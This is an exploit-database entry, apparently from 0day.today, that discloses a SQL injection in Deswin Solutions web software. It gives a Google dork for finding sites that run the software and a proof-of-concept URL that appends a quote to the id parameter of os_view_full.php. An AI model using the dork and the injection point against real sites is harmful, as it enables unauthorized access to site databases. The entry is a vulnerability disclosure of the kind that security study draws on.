id: 15938
date: 04/26/2011
title: Deswin Solutions Sql Injection Vulnerability
author: Ahmdosa
cves: 

================================================================
# Exploit Title: Deswin Solutions Sql Injection Vulnerability
# Google Dork: Powered by Deswin Solutions.
# Author: Ahmdosa
# Software Link: http://www.deswin.com.my/
# Version: All Version
================================================================
Exploit:
http://www.Site.com/os_view_full.php?id=1'
================================================================
Greetz To All Tunisians HaCker...
================================================================



#  0day.today [2023-03-23]  #